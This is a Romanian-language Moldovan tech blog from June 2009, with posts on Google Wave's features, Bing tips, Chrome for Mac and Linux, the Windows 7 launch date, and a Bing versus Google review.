Singurul tip media pe care un program de navigare Web trebuie sa il trateze este hypertextul. Elementele de grafica, sunet si cele multimedia constituie specificatii pe care programele de navigare Web le transfera aplicatiilor ajutatoare. Cel mai important avantaj in utilizarea aplicatiilor ajutatoare consta in faptul ca acestea pot fi transferate catre standardul MIME pentru a acoperi operarea cu noi tipuri de fisiere. Denumit uneori viewer.

08.06.2009

Google Wave

Google Wave este un instrument de comunicare, o aplicaţie care combină funcţiile mail-ului clasic şi ale messenger-ului. Fraţii Lars şi Jens Rasmussen, cei care au creat Google Wave, au pornit de la ideea că mail-ul este depăşit şi că messenger-ul este incomplet. Că ambele sisteme, în primul rând mail-ul, nu mai corespund cerinţelor actuale. Că este nevoie de un sistem de comunicare universal care să integreze şi serviciile sociale, să poţi scrie pe Twitter, să transmiţi unui prieten fotografiile de pe Flickr şi să stabileşti ruta excursiei împreuna cu familia ta, apelând la Google Docs (sau alt serviciu similar).

Cum spuneam, Google Wave nu este disponibil deocamdată pentru publicul larg. Asta pentru că aplicaţia se află în stadiu de prototip, deşi este în lucru de doi ani. Va fi disponibilă abia în ultima parte a acestui an.

Interfaţă

Pe scurt, interfaţa lui Google Wave are trei părţi componente:
  1. meniul de navigare şi contacte pe coloana din stânga
  2. inbox-ul pe centru
  3. "wave-ul" în dreapta
Meniul de navigare poate conţine foldere, tag-uri, căutări salvate etc. Sub acesta este lista de contacte, fiecare contact cu câte o poză, iar deasupra listei avem box-ul de căutare.

Şi Inbox-ul începe cu o căsuţă de căutare. Cu câteva excepţii, acesta seamănă cu cel din Gmail. Excepţiile sunt imaginile celor care participă la o anumită conversaţie (în stânga) şi indicatorul de mesaje necitite (în dreapta).

Wave-ul, sau mai simplu fereastra care afişează conversaţia, ocupă partea dreaptă a ferestrei. Conversaţie este un termen depăşit în acest caz pentru că în acea secţiune nu apar doar paragrafe simple de text, ci şi orice alt element adăugat. Google Wave promite să faciliteze adăugarea în aceste conversaţii a multor tipuri de informaţii de la imagini, la jocuri şi hărţi.

Facilităţii

Fiind doar un prototip la această oră, Google Wave nu are implementate toate facilităţile. În plus, până când va fi lansat oficial, vor apărea şi alte funcţii, în afară de cele care sunt deja în plan. Iată câteva dintre facilităţile care se găsesc în prezent în Google Wave, facilităţi prezentate şi la conferinţa de pe 28 mai:
  • poţi da reply la întreg mesajul sau doar la un anumit paragraf, dând click si scriind exact sub paragraful respectiv
  • se poate adăuga ulterior un nou participant la conversaţie prin drag and drop din lista de contacte
  • persoana nou adăugată poate folosi funcţia Playback pentru a se pune rapid la curent cu evoluţia cronologică a conversaţiei
  • dacă cei care participă la o conversatie sunt online, discuţia se va purta "real time", ca pe messenger
  • poţi vedea în timp real ce scrie interlocutorul tău, cuvânt cu cuvânt, în timp ce tastează
  • private conversation - într-o conversaţie la care participă mai multe persoane poţi folosi acest mod pentru a discuta în particular cu unul dintre participanţi
  • photosharing prin drag and drop în fereastră. imaginile apar ca thumbnail-uri în cadrul conversaţiei pentru toţi participanţii la discuţie
  • pot fi share-uite diverse tipuri de informatii. de exemplu, o zonă din Google Maps ce poate fi eventual editată, jocuri etc
  • căutare realtime
  • spell checker avansat - corectează automat în funcţie de context, nu doar de dicţionarul de cuvinte
  • pot fi adăugate gadgeturi pentru diverse site-uri şi aplicaţii online (de exemplu, Twitter)
  • traducere real time
Google Wave va fi open source si va avea un API deschis. Astfel, Google speră că aplicaţia va fi îmbogăţită şi îmbunătăţită de diverşi dezvoltatori software. Vom afla mai multe despre Google Wave spre sfârşitul anului, când va fi lansată.

07.06.2009

Bing Tips & Tricks

Acum, că Bing este disponibil pentru utilizare în afara Microsoft, aici sunt câteva sfaturi şi trucuri rapide care vă vor ajuta să faceti mai mult cu Bing.com.

1. Utilizaţi versiunea completă a Bing
Dacă utilizaţi Bing inafara limitelor geografice a Americii de Nord, sunt şansele ca utilizati o versiune localizată de Bing, in care pot lipsi anumite caracteristici. De exemplu, versiunea Indiei Bing.com nu are istoric de căutare şi imaginea în Pagina Bing de aici nu este atit de interactiva ca în versiunea SUA.

Pentru a explora versiunea completă de Bing, du-te la această pagină şi să setati English - US ca regiune implicita. Acum, va puteţi bucura de toate caracteristicile Bing oriunde.

2. Directioneaza Companiile de la IE Favorite Bar
Dacă căutaţi o companie stoc (de exemplu: GOOG sau MSFT), Bing va crea automat o felie de web pentru firma pe care aţi putea apoi adăuga in IE 8 si urmareste performanţele direct de la IE Favorites Bar. Ai nevoie de Internet Explorer 8 pentru a încerca această facilitate.

3. Ai grija de Previzualizare Hulu Videos dincolo de SUA
Hulu găzduieşte unele emisiuni TV populare, dar problema este că puteţi viziona aceste videoclipuri doar în cazul în care adresă IP a computerul tău este din SUA.

Cu toate acestea, Bing vă permite să urmăriţi preview-urile de Hulu video chiar şi în afara SUA. Doar executa căutarea pentru orice episod al unui show TV pe Bing Video (exemplu) şi rotiţi mausul peste oricare dintre pictograme video pentru a viziona un scurt clip.

4. Salvaţi şi transmiteti pe e-mail rezultatele căutării

Cu Bing, puteţi salva istoricul căutării la un local cu privire, dosar, în interiorul Bing-ului sau pe acauntul Windows Skydrive. Alternativa, puteţi să vă trimiteţi interogări de căutare unui prieten prin e-mail sau sa le publicati pe "peretele" Facebook, prin intermediul Bing. Veţi avea nevoie de Silverlight pentru a partaja interogări în Bing.


5. RSS Feeds cu rezultate de căutare
Spre deosebire de Google sau Yahoo, Bing ofera fluxuri RSS pentru rezultatele lor de căutare pe Web, la care puteţi să vă abonaţi, la interiorul oricărui cititor de fluxuri. Browser-ul dumneavoastră trebuie să fie în stare să auto-detecteze fluxuri RSS al paginilor din Bing sau puteţi adăuga &format=rss Bing la orice URL de căutare şi sa-o transformati într-un flux RSS.

6. Găsiţi pagini care au legatura cu fişiere MP3 sau Documente
Bing (şi Live Search) suportă un unic "contains" operator de căutare, care vă permite să găsiţi pagini web care conţin link-uri la anumite tipuri de fişiere. De exemplu, o căutare ca Susan Boyle conţine: mp3 va afişa pagini care sunt legate de cantareata britanica, de asemenea, acestea au legatura si cu fişiere MP3.

Va urma ...

06.06.2009

Google Chrome acum şi pentru Mac OS & Linux

Compania Google a lansat prima versiune a browser-ului, nou apărut pe piaţă, Chrome care poate fi rulat pe platforma Mac OS şi pe sistemele de operare pe baza de Linux. Google Chrome pentru sistemele de operare din familia Windows a fost lansat în septembrie 2008.

Versiunile browser-ului Chrome pentru sistemele de operare pe baza de Linux şi Mac OS X nu sunt finalizate şi sunt destinate pentru a fi testate. Utilizarea lor zilnică nu este recomandată. Funcţionalităţile acestor versiuni sunt restricţionate. De exemplu, ele nu permit vizionarea videoclipuri pe YouTube, imprimarea de situri. De asemenea, există posibilităţi limitate de a schimba setările. Mai jos puteţi urmări un videoclip depre istoria ce stă în spatele browser-ului Chrome.


Browser-ul Google Chrome a fost pentru prima dată anunţat, pe 1 septembrie 2008. Pe 2 septembrie a fost lansată versiunea beta. Despre încheierea testarii versiunii beta a browser-ul Chrome, Google a anunţat pe 11 decembrie. În primăvara anului 2009, a fost lansata a doua versiune Chrome.

05.06.2009

22 octombrie - lansarea oficiala Windows 7

Toate speculaţiile şi veştile false legate de data de lansare a viitorului sistem de operare Microsoft au luat sfârşit. Microsoft tocmai a anunţat că Windows 7 se va găsi pe rafturile magazinelor începând cu data de 22 octombrie 2009.

22 octombrie este termenul pentru retaileri. RTM-ul (Release To Manufacturing) va avea loc mult mai devreme. Partenerii Microsoft care vor vinde Windows 7 împreună cu PC-urile noi vor primi codul sistemului de operare încă de la sfârşitul lunii iulie.


Lansarea lui Windows 7 reflectă şi o abordare mai precaută a celor de Microsoft privitor la anunţurile oficiale de lansare. Este cunoscut faptul că Microsoft nu prea şi-a respectat termenele de-a lungul timpului. De data aceasta, Microsoft pare să fi calculat cu precauţie o dată rezonabilă de lansare pentru Windows 7.

04.06.2009

Bing – un nou concurent pentru Google?...

Fără nicio legătură evidentă cu ziua copilului, Microsoft şi-a relansat pe 1 iunie motorul de căutare, cu câteva zile mai devreme decât anunţase iniţial. Bing este numele motorului de căutare cu care Microsoft încearcă să reintre în joc şi să vadă la culoare verzişorii de care lacomul Google are parte din plin.

Microsoft nu este la prima încercare de acest fel. S-a mai dat la Google şi cu alte ocazii, fără succes. Live a fost ultima încercare eşuată de rebranding. Dar Live a avut un mare handicap: a fost prost de la început, iar încercările ulterioare de îmbunătăţire au fost tardive. A rămas cu imaginea pătată şi era clar că dacă vrea să mai spere la verzişorii din reclame, Microsoft trebuie să vină cu un motor de căutare mai bun şi neapărat cu un nume nou.

De la prima accesare devine evidentă disperarea Microsoft de a face ceva diferit, de a se diferenţia în anumite aspecte. Altfel nu se justifică decizia de a pune o imagine de fundal pe pagina principală a lui Bing. Este adevărat că nu este o simplă imagine şi nu este nici una singură. Sunt mai multe imagini care pot fi schimbate manual şi fiecare imagine conţine câteva bule cu informaţii de cultură generală. Interesant, dar nu vreau imagini de fundal pe pagina motorului de căutare pe care-l folosesc!

Relevanţa rezultatelor

Deşi se mai laudă din când în când cu mărimea indexului şi numărul astronomic al paginilor indexate, Google şi ceilalţi au recunoscut că degeaba indexezi sute de miliarde de pagini dacă rezultatele returnate nu sunt relevante. Iar relevanţa a fost şi este în continuare punctul forte al lui Google.

Din fericire pentru Microsoft şi pentru utilizatorii care îl vor folosi, Bing stă destul de bine la relevanţă. Am încercat destul de mute căutări cu Bing şi le-am comparat cu Google. Rezultatele returnate de Bing nu sunt identice cu cele de pe Google. Ar fi fost şi stupid să fie aşa. Dar sunt relevante, de cele mai multe ori, inclusiv pe căutarea după site-urile moldovenesti,româneşti. Dă şi rateuri uneori, însă în cea mai mare parte rezultatele oferite de Bing sunt relevante.

Căutarea după imagini suferă puţin la capitolul relevanţă, comparativ cu Google. Apar destul de multe imagini care nu au ce căuta la un anumit cuvânt cheie. Nici Google nu străluceşte la acest capitol, dar oricum stă ceva mai bine.

Facilităţi

La capitolul facilităţi, din păcate, Bing face o distincţie clară între Statele Unite şi Moldova. Acesta detectează automat ţara şi, în cazul locului si "popularitatii" Moldovei, el ne detecteaza ca Romania, restrângind drastic numărul de facilităţi pentru aceste tari (precum si pentru alte tari externe pentru SUA). De fapt, rămân doar căutarea normală şi cea după imagini. Dacă vrei să alegi altă ţară trebuie să dai click pe link-ul din colţul stânga sus şi să alegi o ţară din listă.

Nu e ca şi cum servicii precum Live Maps sau altele nu ar fi disponibile pentru ţara noastră. Doar că Microsoft nu le-a legat încă de Bing. Şi mai frustrant este că anumite facilităţi lipsesc fără vreun motiv evident din Bing Moldova(România). De exemplu, o funcţie interesantă este scurtul preview din dreptul rezultatelor. Ei bine, nici acesta nu este disponibil pentru Moldova(România).

În afară de preview, Bing mai are (nu şi pentru Moldova(România) şi alte facilităţi/secţiuni, în fucţie de tipul de informaţie căutat. Există mai multe categorii de căutări (biografii, cărţi, bloguri, citate, ştiri etc.) La fel ca Google, Bing poate salva istoricul căutărilor. În plus, ceea ce e puţin neobişnuit, Bing oferă fluxuri RSS pentru rezultate.

Căutare după imagini

Chiar dacă nu este foarte relevantă, căutarea după imagini beneficiază de câteva facilităţi interesante. În primul rând, pagina cu rezultate este "curată", conţinând numai imaginile. Informaţiile legate de acestea apar doar când duci cursorul deasupra lor. Tot acolo există link-ul "afişare imagini similare" care filtrează doar imaginile cu conţinut asemănător. Asta în teorie, în practică similitudinile sunt relative.

Îmi pace la căutarea după imagini funcţia de "scroll infinit". În timp ce derulezi în jos, Bing încarcă şi alte imagini. În acest fel, a fost eliminată nevoia de pagini multiple.

Imaginile pot fi afişate mai mici sau mai mari, Bing oferind patru dimensiuni presetate. De asemenea, există 5 filtre pentru imagini în funcţie de dimensiune, aspect (pătrate, late, înalte), color sau alb negru, stil (fotografii sau ilustraţii) şi oameni (doar feţe, portrete şi altele). Din păcate şi în acest caz între teorie şi practică este distanţă mare. De multe ori imaginile afişate nu corespund filtrelor selectate.

Bing vs Google

Bing pare un motor de căutare promiţător, dar deocamdată nu se poate pune cu Goliath. Dacă vrea să fure clientela lui Google trebuie să vină cu mult mai mult decât atât. Chiar dacă ar fi egalitate între cei doi, tot Google ar avea câştig de cauză pentru că utilizatorii sunt obişnuiţi cu el.

În Moldova, unde Google are peste 82% cotă de piaţă, Bing are în acest moment şanse mici de succes. Secţiunea pentru Moldova nu exista, iar pentru România (Deoarece ne i-a ca Romania) este foarte slabă din punctul de vedere al facilităţilor şi nu numai. Am observat că Bing afişează la căutări doar în limba română şi pagini scrise în alte limbi, ceea ce este destul de grav.

Bing este un nou născut pe terenul motoarelor de căutare, chiar dacă are moştenirea genetică a înaintaşilor lui. Iar Microsoft mai are multe de învăţat pe online până să se adapteze şi să poată concura de la egal la egal cu Google. Cu toate astea, Bing este binevenit pentru că în orice domeniu este nevoie de concurenţă pentru a putea fi atinse succese mari.

    Blog din Moldova    FastCounter 

 
Copyright © 2008-2010 Foster1. All rights reserved.